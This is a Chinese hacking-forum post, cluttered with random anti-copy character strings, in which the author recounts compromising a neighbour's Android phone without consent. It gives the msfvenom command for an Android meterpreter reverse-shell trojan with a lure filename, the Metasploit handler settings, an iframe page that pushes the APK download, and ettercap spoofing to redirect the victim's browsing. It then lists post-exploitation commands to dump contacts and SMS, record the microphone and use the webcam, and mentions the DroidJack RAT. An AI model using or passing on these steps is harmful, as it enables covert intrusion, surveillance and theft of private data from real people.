中国网络渗透测试联盟

标题: metasploit+ettercap中间人攻击成功入侵邻居手机 [打印本页]
作者: admin    时间: 2018-10-20 20:30
标题: metasploit+ettercap中间人攻击成功入侵邻居手机

. ?+ O$ P+ i& M' _! ]# K7 L 五、msf+ettercap入侵邻居安卓手机 / q) P; R9 O4 G' j

x& f2 _0 a) {& R+ p# @& W7 g! y4 w

& Q7 J- c" v3 M2 L( a 首先启动msf ' }" B( }5 W4 z3 L6 ^

) c/ E& q D$ } q2 T" H

9 F( f n/ V$ j/ k% _6 V% ?0 t; O- ^ 先用kali生成一个安卓木马,如下命令: 3 F1 \2 {! M; s& m( f/ U) I4 M

- ]' N8 _% i2 w

( I6 Y5 M) Y2 j3 M# g Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 1 x; y3 r0 h! U2 v0 F1 \

! ~% |8 E7 f4 n0 E6 U9 P7 _

2 z o3 d$ ?4 q 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 : S6 B! f$ w+ {

5 F; Q* B4 `: ?- o

1 s$ ?4 y, o6 x' E 然后进入msf # `9 x5 q: P# A, G9 _6 p# q) I

3 m& |5 ~, X7 @5 q0 Q. @8 k

7 z' ?+ |% V: \ use exploit/multi/handler * o5 V7 I9 {" E& c. _0 C& T5 `

# l8 N4 G% e( I% a/ R: B/ P

; x9 U5 j5 ]+ S: @5 c) N) L set payload android/meterpreter/reverse_tcp : a$ m/ t& u4 M1 X4 |0 r

: A# D( b# ^9 P" X& _; Y9 u

( e; u% ^9 a7 N J( M2 ? set LHOST 192.168.0.109 //ipkailiip 6 b4 t( G- }2 F+ ?/ [: M

: p7 }$ a* l4 z# a( E& }

. n$ x! ]# g, B2 \: e: z2 h# _* {; q set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ! |' c$ i- y/ h' s$ w

. D% {5 X; a) Z/ `! \

6 ]% j5 `* X1 ^6 h: e( k$ p+ Q Exploit 8 G s% f2 q+ L: X

+ B3 J( c" W: p) s8 l2 S* ?" u

; x9 L! m5 P1 y% N   ( J" T q u! J/ `/ D; }

( i( r( m9 F& f0 z& T

3 Z; g3 _0 O% [! a: s4 [! \! q) U 下面我们开启ettercap -G - g' @: T3 ?7 c

7 A1 C* Z' O( B6 P0 Y

2 Z+ ]0 {5 w4 l: i, |/ k3 [- j 我物理IP $ ~3 q- [! h ^+ y" h

& O: p& d {$ S) l, Z3 ?- y" l8 y' @

7 P& Q2 x4 l( X A   * n$ v, b- s# Q$ k

. }" p) ]+ c9 t3 N9 c6 O2 R( C

' ~8 Y! z# B+ [* }' Y+ r8 ~3 Y1 z 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, - T% K6 p7 u- @' a7 v9 h( E

4 U4 b! h$ g' \# S0 _# z

1 D6 ^4 @2 ]$ h1 R) |& f6 d 下面我们来设置一下 & A8 R" n4 x, i) g, X, W

- r' j( o+ g2 @" K1 ~6 t

# d" H, [/ X4 \8 s! H/ L   8 n# W% o. {7 n! @! D: m1 ~

( I, j9 T- s C. |

+ W# \& L- _' E) k 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ! p' g! B2 v4 x

- l% k' M) p9 T1 w1 e( `% O

' q; W% ~, I3 X7 o   5 z! N+ O) N% A/ B/ n

* A# P* ?3 O, s% o" j! B0 m9 s9 t$ p

/ Y1 P0 p( I) R: b" h   8 {# @( {- d: h8 T+ H. d

7 s- Y' c F- V

5 p: i8 n' A. U/ t5 n9 q: |   * f0 n3 c8 N$ L( a

/ i: F- M6 F0 N( O) c& m) _

, T: Y/ ~3 Y$ y7 [% X: D   ' t; ^+ A$ |* `0 x" s

2 P- V) t. j' E' e

# e+ Z9 _9 _1 G' F1 S8 V, i: y   5 z( ^) b6 }. [9 K8 m2 p" ?

0 L' z( T( ^# H4 W5 e

/ \; T. _4 k8 X5 |   - T3 p. W+ o7 ]: o$ o1 A2 T

! ]" C& y3 i. I/ _" A

0 ?: R2 O; I3 E# F# S4 Y   * L. D. j1 G* p, S) p& J# p* b

1 \1 V; S1 F1 L( ~

9 ]: O2 X E" n5 I. I% T# Z   ( w! b" E7 |% o+ |1 F8 K0 E3 v+ @, _

8 z" D! W W! N6 @

( |: R( X$ I( V& @9 r* n" T0 c   8 `! Y, l4 E8 \6 z2 l

, C2 ?4 r4 d7 u

0 ~9 I0 @8 h/ y; |5 u1 a0 v2 e! U( l   2 Y) I3 ?6 U" W( [* p

' K$ s9 ?3 P4 r; [/ r2 u

7 l, Y9 P6 V5 R0 }- s0 G   8 E& C5 T, E+ g$ M4 E+ C

2 @' R1 U# q; A$ Q0 S; O

' @. x" t' D6 v! `4 X1 c `   5 v2 \! H, ?: J- w0 \

: T: {! o! L. \6 H' q* d! { f

! A( t2 d, @) I   ) O# L- K- O/ k5 x* T

$ x/ @% m1 d2 H( H! |" R( W

8 P! Z* u9 P8 ?7 a! Y7 s7 ]+ z) ^5 x 下面我们开始攻击 * Q8 C6 l7 z5 Y, x

) ~3 K% O2 N. S7 a y

+ ?8 z; D1 i) J1 r+ |# P! f   2 Q. p* Q1 T; N* ~

0 [" F( |6 H" Q$ Q+ }: ?" A

5 R6 q5 z2 X( |, U4 X4 L6 h' P   ! R5 q- G8 v( G

. M. r# D/ U9 b8 i! s/ u+ O

/ e7 t9 S- @( `% S   / o# X8 C& G; v/ R' E3 X* ]

8 E* L) b5 {7 Z/ F4 v6 z

: {$ A0 i# z# v   & u2 Q+ e/ Q3 K/ j& [; F/ u, @4 _* l

/ Z5 U4 c: T, }- A$ f

?3 H ~0 g& H9 F3 R   7 F7 [8 e- h% b* e/ x

. D. a; i& C+ z( e; F6 J) Q

+ }" s' s* B9 a! z, E) F9 Z% c 大概过了5分钟多,发现反弹成功了 2 a t1 W' L+ z& G

* }+ V: Y" `! M: d' p6 E* G9 U- `

- f1 y' `/ J' W' e8 ?9 J! z" q* ]   . P C! p4 B5 k

s9 U+ y/ Q. e: w6 K

, u$ M: w' x: f1 k   - P% r2 R- h, O0 \2 l

& U: N& D4 h0 _+ E

1 O8 a/ B( F, H ^0 [* J0 x( X   2 L8 q4 ]$ _. s9 c, ]5 J

% l5 O* h* R/ B0 Z# e

; j! k, s% Z0 T6 O t. I/ M   - o9 m! V0 O) M( C

1 h* m4 F( \' P0 F' @+ u

d- A+ V. q8 v" w   9 G2 r% h% j& c5 z/ g' }1 A; O

3 y$ V7 G* v6 a; Q) {( I% b. w6 z, Q

; j" N. }7 l0 o5 [   : f8 _" t, z( c0 H' a

) n: V) N" |, ^7 K* g

v* G3 X D$ F0 L1 d8 B2 N   ( \: O7 Y! L, q' N

, m" R/ G4 ~0 n H, S1 K

" B( K$ Z0 ]* O, j; q! h; ] 执行命令 ) o0 q. X |& x" x6 l& n

: d9 j. f# l3 D3 X

- h4 k4 z2 g+ A' [   , W1 g# w+ P4 K) |) C

. n6 W/ ]; f9 U0 e; I

* I( n a7 q% B* @( ^3 T4 @* } dump_contacts    --》这个是导出电话 ) [$ [ a2 B+ d/ ]

# t, ~4 C$ D* G: z B# E( h; g: Y8 u

: _* a7 w+ Z, O8 i! }# [! r2 E$ C+ t dump_sms --》这个是导出信息 7 v* n q6 Q6 ^

2 k: @3 a3 q' K5 k C

3 |9 a/ g) I p$ W$ C, S record_mic     Record audio from the default microphone for X seconds * w: d- {/ T$ v, c

8 ^' [5 @3 }* x c5 u

. f5 H2 q- E J- H$ h( l/ _; U     webcam_chat    Start a video chat ! z/ x1 Z$ e! G8 [

. ^% p- r7 r; p/ y6 G( w

5 F5 B6 X, I9 O0 X" X     webcam_list    List webcams 4 j1 d2 X4 ~# }% w4 q

. L5 _- I! e2 e g& r

7 B6 p5 z- j2 v, q     webcam_snap    Take a snapshot from the specified webcam 6 f& r, S5 Q! k, M( c

9 F9 r9 j! @6 m% P+ P

. x+ g ^# r% p8 m webcam_stream  lay a video stream from the specified webcam + ^0 B/ s6 V# T/ k4 G6 N

% U' C' [4 H" T1 H! g% s, i2 v

$ J. c) J9 D5 u! X, K   * R4 d1 c; {2 o5 _7 u0 o

9 ]$ M/ I/ m; @( P

. F* ~/ ~! `2 Y' }4 X5 [( r* v0 `/ ]   - B) f/ }8 c0 g0 O- _

x+ |% f4 G1 }' Q

; ]( ~5 I* L. F8 @0 v 我们打开看一下电话薄, - I9 i+ s# `# L) E8 m! @4 M

0 u' c3 ?" m+ ^ F" r9 i! ^

, j+ @" L# g$ }- K/ y, v   " a& }/ m% t1 t5 N* d9 D3 s4 c' x# H: g

, R4 D& X! \. v/ l$ A+ L! }

5 n# {' u5 ~% \   % m7 Z+ }7 Y# N8 `( p! c8 I1 n

. w* B+ x; C+ k; b3 R

6 E# [: n$ o* o1 {* g8 E- S, b7 ~- g   0 u) c+ U/ t* F* s: L! F1 m# P

: w; Z0 |8 L% f; Y# U3 J

! _6 V" l9 e2 v) A" U( d0 Q/ |   $ c: M. U# w- ~( D/ O9 @' ?

6 h3 p; ?1 A9 E

- S0 K$ h2 f: G0 a0 y! P0 m   " b6 v+ h1 p$ T5 l; D& v7 [

7 I" k+ p9 o4 J9 a, t3 `$ P

3 g& ?* a6 E+ }   2 L+ `- y4 b3 O

! ~) E& j7 c1 Z: \5 Z

( s' \) P8 E6 B" f1 p, Q. a 我们同时欺骗成DroidJack木马,使用方法如图: + M1 o. z5 {+ o S- n4 h

: A( O f) s! L+ {5 }" }

( l; \! X u- _# W3 X) \+ q7 Z" u/ Z   + X' Q" z) B: D& F E: A

8 k& C- T3 K! R5 }" ~$ u

2 ]( T% q! m* v; j* ^' e" B1 P   % [% m! V) X: i! [+ n3 z

: J) \6 W/ | x

' L8 H# j) F6 G3 c6 ~   8 N4 Q' { x3 y; g9 y ^

& ^+ n6 Y( Z' [0 H4 \2 q

- X. G* q5 i) u+ H- U0 L6 U. o$ B- F 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 . R, M- O! D4 A' g4 g. j1 I

; i5 T# p' P1 X6 j! n% g- r

' l2 v; B0 I; q! j+ z9 j   # _* \+ ^2 ]+ O4 l

/ e8 ~$ W9 k/ a- s

/ J! Y0 m; ^9 A [. ?% U   ) Q- m/ N! u$ r$ X9 d% ?

7 u7 N' S6 u" ~- p( S

6 h: ]( t# J, M9 R/ G! \   , v- L; x D" S( R3 x: t

8 f/ k4 R, _5 r* @# n% D. {4 G

' ^) m- q6 b% K 0 D- Y5 D! ~8 S9 c' S) [

1 h" V, w% G+ f. @0 e

3 G+ B, X# V" L7 ~
4 g- ~5 Q. h/ F6 S





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2